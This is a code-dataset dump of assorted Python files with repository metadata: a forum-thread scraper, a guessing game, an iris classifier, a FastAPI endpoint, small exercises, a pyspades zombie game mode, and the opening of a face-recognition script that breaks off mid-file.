repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
sequence | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
defchen/LearningPython | 850,403,574,402 | 6c6d6adf8bb666987fe66f6fccbd517d0d402fd4 | 061fa1504d59e24bc379c4c91670f926aa516d07 | /learning/spider/spider_to_1024.py | 29d2d579f17ade1d2f38a0c8b5056246a91167ed | [] | no_license | https://github.com/defchen/LearningPython | a5189c643fee667e0705bce24e385bf7e4288ae5 | eaae52dd7aef3ba97b333b784f2fcf8b9ba5002b | refs/heads/master | 2021-01-22T10:46:34.776815 | 2017-02-15T07:53:31 | 2017-02-15T07:53:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
@Author: liujinjia
@Date: 2017-02-15 13:52:42
@Project : LearningPython
@File : spider_to_1024.py
@Last Modified by: liujinjia
@Last Modified time: 2017-02-15 15:49:05
"""
import requests
from bs4 import BeautifulSoup
class Spider:
    """Scraper for a 1024-style image board: walks the index page to a
    thread, then follows the thread's download link."""

    # Board index page; all requests share one keep-alive session.
    start_url = 'http://www.dxlymm.com/thread0806.php?fid=5'
    session = requests.Session()

    @classmethod
    def get_home_page(cls, url=None):
        """Fetch *url* (or the board index when None) and return its text.

        The site serves GBK-encoded pages, so the encoding is forced
        before decoding.
        """
        target = cls.start_url if url is None else url
        page = cls.session.get(target)
        page.encoding = 'gbk'
        return page.text

    @classmethod
    def parse_pages(cls):
        """Parse the board index and return every <tr> row element."""
        soup = BeautifulSoup(cls.get_home_page(), 'lxml')
        return soup.findAll('tr')

    @classmethod
    def get_uri_list(cls):
        """Return absolute thread URLs for every index row with a title."""
        return ["http://www.dxlymm.com/" + row.h3.a.get('href')
                for row in cls.parse_pages()
                if row.h3 is not None]

    @classmethod
    def get_seed_page(cls):
        """Open the thread at index 11 and return the text of its first
        target="_blank" link (presumably the download-page URL — the
        hard-coded index likely skips sticky threads; confirm)."""
        thread_html = cls.get_home_page(cls.get_uri_list()[11])
        return BeautifulSoup(thread_html, 'lxml').find('a', {"target": "_blank"}).string

    @classmethod
    def get_seed(cls):
        """Fetch the download page located by get_seed_page() and print it.

        The page exposes hidden <INPUT> ``ref``/``reff`` values that can be
        spliced into http://www.rmdown.com/download.php to fetch the seed.
        Returns None (the page is only printed).
        """
        page = cls.get_home_page(cls.get_seed_page())
        print(page)
if __name__ == '__main__':
    # Entry point: runs the whole scrape chain over the network; get_seed()
    # prints the page itself and returns None, so this also prints "None".
    print(Spider.get_seed())
| UTF-8 | Python | false | false | 2,033 | py | 3 | spider_to_1024.py | 3 | 0.596353 | 0.54066 | 0 | 67 | 29.268657 | 132 |
IsaacYAGI/python-ejercicios | 2,327,872,276,990 | 8498ba69e4cc5c5f480644ac20d878fb2a632bee | 50b69776bee7ad3a6068235c6c8981c06a17629a | /tema39-biblioteca-estandar-python/ejercicios-propuestos/ejercicio_propuestos1_tema39.py | aec8b8678f361a8deff93de03c4eb45b80a56732 | [] | no_license | https://github.com/IsaacYAGI/python-ejercicios | 665db9b6286d4840e8fa9c2d9b42b1389753b806 | fe8d9b96a7e947dd3fa992dfac39049fa68935c5 | refs/heads/master | 2021-06-04T11:03:53.466163 | 2017-07-29T03:17:15 | 2017-07-29T03:17:15 | 98,049,960 | 3 | 3 | null | false | 2021-02-24T05:07:15 | 2017-07-22T18:20:42 | 2017-07-22T20:33:05 | 2021-02-24T05:06:37 | 23 | 0 | 1 | 0 | Python | false | false | '''
Confeccionar un programa que genere un número aleatorio entre 1 y 100 y no se muestre.
El operador debe tratar de adivinar el número ingresado.
Cada vez que ingrese un número mostrar un mensaje "Gano" si es igual al generado o "El número aleatorio el mayor" o "El número aleatorio es menor".
Mostrar cuando gana el jugador cuantos intentos necesitó.
'''
import random
def generar_numero_aleatorio():
    """Return a pseudo-random integer in the closed range [1, 100]."""
    numero_secreto = random.randint(1, 100)
    return numero_secreto
def es_el_numero(resp_usuario, resp_correc):
    """Return True when the user's guess equals the secret number."""
    coinciden = resp_usuario == resp_correc
    return coinciden
def numero_dado_es_mayor(resp_usuario, resp_correc):
    """Return True when the user's guess is above the secret number."""
    es_mayor = resp_usuario > resp_correc
    return es_mayor
def juego_terminado(numero_correcto, numero_intentos):
    """Announce the end of the game with the secret number and try count."""
    print("El juego ha terminado!")
    # Same output as the original comma-separated print (single-space joins).
    print(f"El numero correcto era {numero_correcto} y lo resolviste en {numero_intentos} intentos.")
def el_numero_es_mayor():
    """Hint shown when the guess is above the secret number."""
    mensaje = "El numero que diste es mayor al correcto, intenta de nuevo!"
    print(mensaje)
def el_numero_es_menor():
    """Hint shown when the guess is below the secret number."""
    mensaje = "El numero que diste es menor al correcto, intenta de nuevo!"
    print(mensaje)
def iniciar_juego():
    """Main loop: keep asking for numbers until the secret one is guessed.

    Prints a higher/lower hint after every miss and the attempt count on
    success.  Reads guesses from stdin via input().
    """
    respuesta_correc = generar_numero_aleatorio()
    intentos = 1
    while True:
        numero = int(input("Ingresa un numero: "))
        if es_el_numero(numero, respuesta_correc):
            # Report with the attempt count *before* it would be bumped.
            juego_terminado(respuesta_correc, intentos)
            break
        if numero_dado_es_mayor(numero, respuesta_correc):
            el_numero_es_mayor()
        else:
            el_numero_es_menor()
        intentos += 1
iniciar_juego()  # Script entry point: starts the guessing game immediately when the file runs.
| UTF-8 | Python | false | false | 1,588 | py | 30 | ejercicio_propuestos1_tema39.py | 29 | 0.663717 | 0.656764 | 0 | 54 | 28.259259 | 147 |
jordanfalcao/tensorflow2-deeplearning | 7,756,710,980,553 | e491237e5c49d13e4363c4bcd0dd5fda87ca745f | 6c64e6c286db85d8f57cdaf79f2e3a6109209bb2 | /10-Deployment/01_my_basic_model.py | 3aecceebbd6e086c156880dfb63e41bee7287843 | [] | no_license | https://github.com/jordanfalcao/tensorflow2-deeplearning | 0f929a6429057c3da19e382245ab493e08b0c18a | 2d88d4cb888226cfda7ac4c163fceb452aba103a | refs/heads/main | 2023-07-10T17:58:09.864395 | 2021-08-19T23:29:00 | 2021-08-19T23:29:00 | 383,968,761 | 0 | 0 | null | false | 2021-08-05T22:44:38 | 2021-07-08T01:34:38 | 2021-08-04T19:42:33 | 2021-08-05T22:44:37 | 36,592 | 0 | 0 | 0 | Jupyter Notebook | false | false | # -*- coding: utf-8 -*-
"""01-My-Basic-Model.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1mwM8WLV4fZGkmgwC4EVh91Hfz2bqfUR9
# DEPLOYMENT
**Welcome to deployment section! In this section of the course, we will go through the entire deployment process, starting as if you had to create a servicable model from scratch, then deploy it for others to use, either through API or a web form.**
# Data
For this example we use the very common data set: [iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set), which is about flowers.
From Wikipedia:
The Iris flower data set or Fisher's Iris data set is a multivariate data set introduced by the British statistician and biologist Ronald Fisher in his 1936 paper The use of multiple measurements in taxonomic problems as an example of linear discriminant analysis.[1] It is sometimes called Anderson's Iris data set because Edgar Anderson collected the data to quantify the morphologic variation of Iris flowers of three related species.[2] Two of the three species were collected in the Gaspé Peninsula "all from the same pasture, and picked on the same day and measured at the same time by the same person with the same apparatus".[3]
The data set consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor). Four features were measured from each sample: the length and the width of the sepals and petals, in centimeters.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Load the iris measurements; expects iris.csv next to the script.
iris = pd.read_csv("iris.csv")
iris.head()
"""## Data Processing
### Features and Target
"""
# Features = the four numeric measurements; target = the species name.
X = iris.drop('species',axis=1)
y = iris['species']
y.unique()
# Lots of ways to one hot encode
# https://stackoverflow.com/questions/47573293/unable-to-transform-string-column-to-categorical-matrix-using-keras-and-sklearn
# https://stackoverflow.com/questions/35107559/one-hot-encoding-of-string-categorical-features
from sklearn.preprocessing import LabelBinarizer
# One-hot encode the three species labels into 3-column indicator rows.
encoder = LabelBinarizer()
y = encoder.fit_transform(y)
y[45:55]
"""## Train Test Split"""
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101)
"""### Scaling"""
# Fit the scaler on the training split only, then apply it to both splits.
scaler = MinMaxScaler()
scaler.fit(X_train)
scaled_X_train = scaler.transform(X_train)
scaled_X_test = scaler.transform(X_test)
"""## Model
### Creating the Model
"""
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
# Tiny dense network: 4 inputs -> 4 relu units -> 3-way softmax.
model = Sequential()
model.add(Dense(units=4,activation='relu',input_shape=[4,]))
# Last layer for multi-class classification of 3 species
model.add(Dense(units=3,activation='softmax'))
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
"""## Model Training"""
from tensorflow.keras.callbacks import EarlyStopping
early_stop = EarlyStopping(patience=10)
# model.fit(x=scaled_X_train,
#           y=y_train,
#           epochs=300,
#           validation_data=(scaled_X_test, y_test), verbose=1 ,callbacks=[early_stop])
"""## Model Evaluation"""
# NOTE(review): the fit call above is commented out; model.history is only
# populated after training, so this section assumes fit was run — confirm.
metrics = pd.DataFrame(model.history.history)
metrics.head()
metrics[['loss','val_loss']].plot()
plt.show()
metrics[['accuracy','val_accuracy']].plot()
plt.show()
model.evaluate(scaled_X_test,y_test,verbose=0)
"""## Ready Model for Deployment"""
# Retrain on the full dataset for as many epochs as the first run lasted.
epochs = len(metrics)
# all the data
scaled_X = scaler.fit_transform(X)
model = Sequential()
model.add(Dense(units=4,activation='relu'))
# Last layer for multi-class classification of 3 species
model.add(Dense(units=3,activation='softmax'))
model.compile(optimizer='adam',
              loss='categorical_crossentropy',metrics=['accuracy'])
model.fit(scaled_X,y,epochs=epochs)
model.evaluate(scaled_X_test,y_test,verbose=0)
# Persist the trained model and the fitted scaler for serving.
model.save("final_iris_model.h5")
"""### Saving Scaler"""
import joblib
joblib.dump(scaler,'iris_scaler.pkl')
"""## Predicting a Single New Flower"""
from tensorflow.keras.models import load_model
# Round-trip: reload both artifacts exactly as a deployment service would.
flower_model = load_model("final_iris_model.h5")
flower_scaler = joblib.load("iris_scaler.pkl")
iris.head(1)
flower_example = {'sepal_length':5.1,
                  'sepal_width':3.5,
                  'petal_length':1.4,
                  'petal_width':0.2}
flower_example.keys()
encoder.classes_
def return_prediction(model, scaler, sample_json):
    """Return the predicted iris species name for a single flower.

    Parameters
    ----------
    model : fitted classifier exposing ``predict`` (softmax over 3 classes).
    scaler : fitted transformer exposing ``transform``.
    sample_json : mapping with keys 'sepal_length', 'sepal_width',
        'petal_length' and 'petal_width'.
    """
    # Feature order must match the columns the scaler/model were fit on.
    feature_order = ('sepal_length', 'sepal_width', 'petal_length', 'petal_width')
    raw_features = [[sample_json[key] for key in feature_order]]
    scaled_features = scaler.transform(raw_features)
    species_names = np.array(['setosa', 'versicolor', 'virginica'])
    # argmax over the softmax row picks the most probable class index.
    predicted_index = np.argmax(model.predict(scaled_features), axis=-1)
    return species_names[predicted_index][0]
# calling the function
return_prediction(flower_model,flower_scaler,flower_example) | UTF-8 | Python | false | false | 5,143 | py | 70 | 01_my_basic_model.py | 36 | 0.720537 | 0.706145 | 0 | 186 | 26.650538 | 636 |
takecian/ProgrammingStudyLog | 13,984,413,562,158 | 46099aa352116e9ec26130b601e61b559c60c7fe | bde6ed092b7b29703737e11c5a5ff90934af3d74 | /AtCoder/typical_dp/006c.py | 2e87c3a9bfb5a07e9b900a274e0044898c002dc6 | [] | no_license | https://github.com/takecian/ProgrammingStudyLog | 2ab7ea601e0996b3fa502b81ec141bc3772442b6 | 94485d131c0cc9842f1f4799da2d861dbf09b12a | refs/heads/master | 2023-04-28T16:56:18.943574 | 2023-04-18T06:34:58 | 2023-04-18T06:34:58 | 128,525,713 | 4 | 0 | null | false | 2022-12-09T06:15:19 | 2018-04-07T12:21:29 | 2022-07-04T14:37:10 | 2022-12-09T06:15:18 | 18,241 | 3 | 0 | 7 | Python | false | false | # https://beta.atcoder.jp/contests/abc006/tasks/abc006_3
# a + b + c = N
# 2a + 3b + 4c = M
# Find non-negative integers (a, b, c) satisfying both equations, or -1 -1 -1.
N, M = map(int, input().split())
# Original O(N^2) brute-force search, kept for reference:
#
# ans_a = -1
# ans_a = -1
# ans_a = -1
#
# for a in range(N+1):
#     rest = N - a
#     for b in range(rest+1):
#         c = rest - b
#         if c < 0:
#             break
#         if 2 * a + 3 * b + 4 * c == M:
#             print(str(a) + ' ' + str(b) + ' ' + str(c) + '\n')
#             exit(0)
#
# print('-1 -1 -1\n')
#
# in case of 0 elder person
# a + c = N
# 2a + 4c = M
# Even M: fix b = 0 and solve the 2x2 system -> a = 2N - M/2, c = M/2 - N.
# (Larger even b only shrinks both a and c, so b = 0 is the only candidate.)
if M % 2 == 0:
    a = 2 * N - M // 2
    c = M // 2 - N
    if a >= 0 and c >= 0:
        print(str(a) + ' 0 ' + str(c) + '\n')
        exit(0)
# Odd M: fix b = 1 and solve a + c = N - 1, 2a + 4c = M - 3.
if M % 2 == 1:
    a = 2 * N - (M + 1) // 2
    c = -N + (M - 1) // 2
    if a >= 0 and c >= 0:
        print(str(a) + ' 1 ' + str(c) + '\n')
        exit(0)
# Reached only when no non-negative solution exists.
print('-1 -1 -1\n')
# in case of 1 elder person
# a + c = N - 1
# 2a + 4c = M - 3
| UTF-8 | Python | false | false | 902 | py | 883 | 006c.py | 861 | 0.370288 | 0.310421 | 0 | 46 | 18.608696 | 64 |
sntzhd/sntzhd_back | 5,617,817,273,287 | a3b60d92805b9955365f9eccdc031a62f67b9ee2 | 8424f7ca88935497df49544e60e9ed48a6243e0e | /backend_api/indication/endpoints.py | b15d252109df992eaa34b10641e96eede5b7ae34 | [] | no_license | https://github.com/sntzhd/sntzhd_back | 622996d0ea917f4a24fbb74620fb130266979078 | 13128989bd53657d55c5154f56e56a5944f7b771 | refs/heads/master | 2023-05-24T09:25:05.120897 | 2021-06-13T11:16:58 | 2021-06-13T11:16:58 | 367,019,313 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fastapi import Depends, FastAPI, HTTPException, APIRouter
from backend_api.db.sql_app import crud, database, models, schemas
from backend_api.db.sql_app.database import db_state_default
database.db.connect()
database.db.create_tables([models.Item])
database.db.close()
router = APIRouter()
async def reset_db_state():
database.db._state._state.set(db_state_default.copy())
database.db._state.reset()
def get_db(db_state=Depends(reset_db_state)):
try:
database.db.connect()
yield
finally:
if not database.db.is_closed():
database.db.close()
@router.post(
"/items/",
response_model=schemas.ItemBase,
dependencies=[Depends(get_db)],
)
def create_item_for_user(item: schemas.ItemBase):
return crud.create_item(item=item) | UTF-8 | Python | false | false | 796 | py | 37 | endpoints.py | 32 | 0.69598 | 0.69598 | 0 | 31 | 24.709677 | 66 |
EmaSMach/info2020 | 12,970,801,279,010 | 8e13fbe8b71dccad22b43ca25bbdb368d8776d0a | fdb8d96d06cb7e74153a178fd17b449e89f44cd0 | /desafios/complementarios/condicionales/desafio16_descuento_camisas.py | 1183312cd82977baba879c036daddeb3c2dd341f | [] | no_license | https://github.com/EmaSMach/info2020 | c84916521d2dd21040419cb469c76c589b98be89 | a184dc376cb5e0b894a32d01681b71c824d993d3 | refs/heads/master | 2022-12-06T08:52:34.994922 | 2020-08-24T02:57:40 | 2020-08-24T02:57:40 | 273,131,222 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Desafío 16
# Hacer un programa que calcule el total a pagar por la compra de camisas.
# Si se compran tres camisas o mas se aplica un descuento del 20% sobre el
# total de la compra y si son menos de tres camisas un descuento del 10%.
cantidad_camnisas = int(input("Camisas Compradas: "))
precio_camisa = float(input("Precio camisa: "))
# Bulk purchases (3+ shirts) earn 20% off; smaller purchases get 10% off.
descuento = 20 if cantidad_camnisas >= 3 else 10
subtotal = precio_camisa * cantidad_camnisas
print(f"Total a pagar: $ {subtotal - (subtotal*descuento/100)}")
| UTF-8 | Python | false | false | 528 | py | 67 | desafio16_descuento_camisas.py | 67 | 0.719165 | 0.6926 | 0 | 17 | 30 | 75 |
Colorpinpoint/pyspades-userscripts | 8,486,855,423,698 | 7d1293b78c5de507e828d9512a246869993c9615 | 87df4bda6d6da9b1ce0360328a372c54037e4264 | /zombies.py | c6ed0877c75ab263f9846bbed0182904367f4b8f | [] | no_license | https://github.com/Colorpinpoint/pyspades-userscripts | 58910c3ca3c3b31d5f9c8d76b5a55e97c083fd10 | e0c24f10312d9f72031723747c48fbd456e780bf | refs/heads/master | 2016-10-10T11:35:46.593848 | 2012-07-30T03:23:18 | 2012-07-30T03:23:18 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pyspades.server import orientation_data, grenade_packet, weapon_reload, set_tool
from pyspades.common import coordinates, Vertex3
from pyspades.world import Grenade
from commands import add, admin
from math import sin, floor, atan2
from pyspades.constants import *
from pyspades.server import block_action
from pyspades.collision import distance_3d
from twisted.internet.task import LoopingCall
HEAL_RATE = 1000  # HP added per friendly spade hit in on_hit (caps at full health)
HUMAN = 1   # player mode: may build and use weapons
ZOMBIE = 2  # player mode: melee/teleport only, no building or grenades
# ZOMBIE_HUMAN = HUMAN | ZOMBIE
S_ZOMBIE_VERSION = 'Zombies 1.1.0 RC1 by Dany0, infogulch'
S_ZOMBIE_HEALTH = 'Zombie health is %i.'
S_ZOMBIE_TELEPORT = 'Zombies teleport %i blocks high.'
S_ZOMBIE_SPAWN = 'Zombies spawn %i blocks high.'
# Combined status line: expects three %i args (health, teleport, spawn height).
S_ZOMBIE_STAT = S_ZOMBIE_HEALTH + ' ' + S_ZOMBIE_TELEPORT + ' ' + S_ZOMBIE_SPAWN
@admin
def zhp(connection, value):
    """Admin command: set the zombie health value used for damage scaling.

    The argument is coerced to a non-negative float before being stored on
    the protocol.
    """
    protocol = connection.protocol
    hp = abs(float(value))
    protocol.ZOMBIE_HP = hp
    # Echo the value actually applied.  The original interpolated the raw
    # command argument into the %i format (and contained a dead
    # "if value == 0: a = True" branch); %i on a non-numeric raw argument
    # raises TypeError.
    connection.send_chat(S_ZOMBIE_HEALTH % hp)
@admin
def ztel(connection, value):
    """Admin command: set how many blocks upward a zombie teleports per dig."""
    teleport_height = abs(int(value))
    connection.protocol.ZOMBIE_TELEPORT = teleport_height
    connection.send_chat(S_ZOMBIE_TELEPORT % teleport_height)
@admin
def zspawnheight(connection, value):
    """Admin command: set the height above ground at which zombies spawn.

    Values below 10 disable elevated spawning (the height is forced to 0).
    """
    protocol = connection.protocol
    val = abs(int(value))
    if val >= 10:
        protocol.ZOMBIE_SPAWN_HEIGHT = val
        connection.send_chat(S_ZOMBIE_SPAWN % val)
    else:
        # abs() guarantees val >= 0, so the original `elif val < 10` was
        # always taken when the first branch was not: plain `else` suffices.
        protocol.ZOMBIE_SPAWN_HEIGHT = 0
        connection.send_chat('Disabling zombie spawning up in the air')
def zombiestat(connection):
    """Chat command: report the mod version and the current zombie tuning."""
    connection.send_chat(S_ZOMBIE_VERSION)
    # S_ZOMBIE_STAT contains three %i slots (health, teleport, spawn height);
    # the original supplied only two values, which raises TypeError at
    # runtime.  on_login (which formats the same string) passes all three.
    connection.send_chat(S_ZOMBIE_STAT % (connection.protocol.ZOMBIE_HP,
                                          connection.protocol.ZOMBIE_TELEPORT,
                                          connection.protocol.ZOMBIE_SPAWN_HEIGHT))
# Register the chat/admin commands with the pyspades scripting framework.
add(ztel)
add(zhp)
add(zombiestat)
add(zspawnheight)
def apply_script(protocol, connection, config):
    """pyspades script hook: wrap the server's protocol/connection classes
    with zombie-mode behaviour and return the subclasses to install."""
    class ZombiesProtocol(protocol):
        # Holds the tunable zombie parameters that the admin commands mutate.
        def __init__(self, *arg, **kw):
            protocol.__init__(self, *arg, **kw)
            self.ZOMBIE_TELEPORT = 17      # blocks climbed per spade dig
            self.ZOMBIE_HP = 650           # effective zombie health for damage scaling
            self.ZOMBIE_SPAWN_HEIGHT = 0   # 0 disables elevated spawning
    class ZombiesConnection(connection):
        zombies_playermode = 0 #must be a class instance variable to overload connection.refill()
        def on_spawn(self, pos):
            """Assign HUMAN/ZOMBIE mode by team and set up the spawn state."""
            if self.team is self.protocol.green_team:
                # once spawned, human-zombies turn back into zombies
                self.zombies_playermode = ZOMBIE
                self.health_message = False
                self.quickbuild_allowed = False
                self.clear_ammo()
                ## this makes zombies appear to have a weapon when they have a block
                # set_tool.player_id = self.player_id
                # set_tool.value = SPADE_TOOL
                # self.protocol.send_contained(set_tool, sender = self)
                if self.protocol.ZOMBIE_SPAWN_HEIGHT > 0:
                    # Drop the zombie in from above its spawn point.
                    player_location = self.world_object.position
                    loc = (player_location.x, player_location.y, player_location.z - self.protocol.ZOMBIE_SPAWN_HEIGHT)
                    self.set_location_safe(loc)
            else:
                self.zombies_playermode = HUMAN
                self.health_message = True
                self.quickbuild_allowed = True
            return connection.on_spawn(self, pos)
        def create_explosion_effect(self, position):
            """Show a cosmetic grenade blast at *position* (no damage: the
            packet is attributed to player id 32 with zero fuse)."""
            self.protocol.world.create_object(Grenade, 0.1, position, None, Vertex3(), None)
            grenade_packet.value = 0.0
            grenade_packet.player_id = 32
            grenade_packet.position = position.get()
            grenade_packet.velocity = (0.0, 0.0, 0.0)
            self.protocol.send_contained(grenade_packet)
        def on_line_build_attempt(self, points):
            # Zombies may never build.
            if self.zombies_playermode == ZOMBIE:
                return False
            # NOTE(review): the delegation below omits `self`, unlike
            # on_block_build_attempt — likely a TypeError when a human
            # line-builds; confirm against the pyspades API.
            return connection.on_line_build_attempt(points)
        def on_block_build_attempt(self, x, y, z):
            if self.zombies_playermode == ZOMBIE:
                return False
            return connection.on_block_build_attempt(self, x, y, z)
        def on_block_destroy(self, x, y, z, value):
            """Zombies digging with the spade teleport ZOMBIE_TELEPORT blocks
            up when the three blocks above the destination are clear."""
            if (self.zombies_playermode == ZOMBIE and value == DESTROY_BLOCK and self.tool == SPADE_TOOL):
                map = self.protocol.map
                ztel = self.protocol.ZOMBIE_TELEPORT
                player_location = self.world_object.position
                px, py, pz = player_location.x, player_location.y, player_location.z
                if (not map.get_solid(px, py, pz-ztel+1)
                    and not map.get_solid(px, py, pz-ztel+2)
                    and not map.get_solid(px, py, pz-ztel+3)):
                    self.create_explosion_effect(player_location)
                    self.set_location((px, py, pz - ztel))
            return connection.on_block_destroy(self, x, y, z, value)
        def on_flag_capture(self):
            # A capturing zombie is promoted to a weapon-capable human-zombie.
            if self.team is self.protocol.green_team:
                self.zombies_playermode = HUMAN
                self.refill()
                self.send_chat('YOU ARE HUMAN NOW RAWR GO SHOOT EM')
                self.protocol.send_chat('%s has become a human-zombie and can use weapons!' % self.name)
            return connection.on_flag_capture(self)
        def on_flag_take(self):
            # Carrying the flag doubles a human's HP but weakens a zombie's.
            if self.team is self.protocol.blue_team:
                self.set_hp(self.hp*2)
            else:
                self.set_hp(self.hp/1.6)
            return connection.on_flag_take(self)
        def on_grenade(self, time_left):
            # Zombies cannot use grenades at all.
            if self.zombies_playermode == ZOMBIE:
                self.send_chat("Zombie! You fool! You forgot to unlock the pin! It's useless now!")
                return False
            return connection.on_grenade(self, time_left)
        def on_hit(self, hit_amount, hit_player, type, grenade):
            """Scale damage by distance and zombie health; also implements
            teammate spade-healing for the human (blue) team.

            (`type` shadows the builtin; kept for pyspades API compatibility.)
            """
            new_hit = connection.on_hit(self, hit_amount, hit_player, type, grenade)
            if new_hit is not None:
                return new_hit
            other_player_location = hit_player.world_object.position
            other_player_location = (other_player_location.x, other_player_location.y, other_player_location.z)
            player_location = self.world_object.position
            player_location = (player_location.x, player_location.y, player_location.z)
            # Damage multiplier grows with distance: 1 + sin(dist/80).
            dist = floor(distance_3d(player_location, other_player_location))
            damagemulti = (sin(dist/80))+1
            new_hit = hit_amount * damagemulti
            if self is hit_player:
                if type == FALL_KILL:
                    # No fall damage for anyone.
                    return False
            elif hit_player.zombies_playermode == ZOMBIE and self.weapon == SMG_WEAPON:
                # Shots against zombies are divided by ZOMBIE_HP/100.
                new_hit = (new_hit/(self.protocol.ZOMBIE_HP/100))
                if new_hit >=25:
                    self.create_explosion_effect(hit_player.world_object.position)
                    self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!")
            elif hit_player.zombies_playermode == ZOMBIE and self.weapon != SMG_WEAPON:
                if self.weapon == SHOTGUN_WEAPON:
                    # Shotgun pellets each hit, so damage is divided by 8 per pellet.
                    new_hit = new_hit/(self.protocol.ZOMBIE_HP/100)/8
                else:
                    new_hit = new_hit/(self.protocol.ZOMBIE_HP/100)
                if new_hit >=25:
                    self.create_explosion_effect(hit_player.world_object.position)
                    self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!")
            elif self.zombies_playermode == ZOMBIE and type != MELEE_KILL:
                return False #this should never happen, but just in case
            elif (self.team is self.protocol.blue_team and self.team == hit_player.team and
                  type == MELEE_KILL):
                # Friendly spade hits heal teammates up to full health.
                if hit_player.hp >= 100:
                    if self.health_message == True:
                        self.health_message = False
                        self.send_chat(hit_player.name + ' is at full health.')
                elif hit_player.hp > 0:
                    hit_player.set_hp(hit_player.hp + HEAL_RATE)
            return new_hit
        def on_kill(self, killer, type, grenade):
            """Reward the killer: humans are refilled, zombies regain HP."""
            if killer != None and killer != self:
                if killer.zombies_playermode == HUMAN:
                    killer.refill()
                    killer.send_chat('You have been refilled!')
                else:
                    self.send_chat('THE ZOMBIES ARE COMING RAWRRR')
                    killer.set_hp(killer.hp + 25 - killer.hp/10)
            return connection.on_kill(self, killer, type, grenade)
        def clear_ammo(self):
            """Zero the player's clip and reserve ammo, server- and client-side."""
            weapon_reload.player_id = self.player_id
            weapon_reload.clip_ammo = 0
            weapon_reload.reserve_ammo = 0
            self.weapon_object.clip_ammo = 0
            self.weapon_object.reserve_ammo = 0
            self.send_contained(weapon_reload)
        def refill(self, local = False):
            # Zombies never get ammo back from a refill.
            connection.refill(self, local)
            if self.zombies_playermode == ZOMBIE:
                self.clear_ammo()
        def on_login(self, name):
            # Greet the player with the current zombie tuning values.
            protocol = self.protocol
            self.send_chat(S_ZOMBIE_STAT % (protocol.ZOMBIE_HP, protocol.ZOMBIE_TELEPORT, protocol.ZOMBIE_SPAWN_HEIGHT))
            return connection.on_login(self, name)
return ZombiesProtocol, ZombiesConnection | UTF-8 | Python | false | false | 9,454 | py | 5 | zombies.py | 4 | 0.576687 | 0.568542 | 0 | 212 | 43.599057 | 120 |
newasu/FaceRecognitionPython | 11,957,188,952,317 | 2692af2249efecee8bd76aebecd71882c942d08e | db6ba700742584d71bd2f9f1d66627060235bb49 | /Scripts/testscript_11.py | c909039f83568b5e7a7f880f21920b507cd34489 | [] | no_license | https://github.com/newasu/FaceRecognitionPython | 27119747e53975a4c19fcf4b89682a4df7498606 | 536bcfeb852fd1c4f93b59636fbb6182b5e9996f | refs/heads/master | 2021-07-21T05:20:40.363671 | 2021-02-01T08:38:04 | 2021-02-01T08:38:04 | 237,888,319 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Add project path to sys
import sys
sys.path.append("./././")
# Import lib
import pandas as pd
import numpy as np
import os
import glob
import cv2
from mtcnn.mtcnn import MTCNN
import tensorflow as tf
from keras_vggface.vggface import VGGFace
from keras_vggface import utils
# Import my own lib
import others.utilities as my_util
# Pin all TensorFlow work to a single GPU.
gpu_id = 0
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
# Clear GPU cache
tf.keras.backend.clear_session()
gpus = tf.config.experimental.list_physical_devices('GPU')
# Grow GPU memory on demand instead of pre-allocating the whole card.
tf.config.experimental.set_memory_growth(gpus[0], True)
#############################################################################################
# Path
# Dataset path
lfw_test_cleaned_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cleaned'])
lfw_test_crop_face_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cropped'])
# Make directory
my_util.make_directory(lfw_test_crop_face_path)
#############################################################################################
# Initialise dataframe
my_column_names = ['gender', 'ethnicity', 'id', 'pose', 'path']
# List files
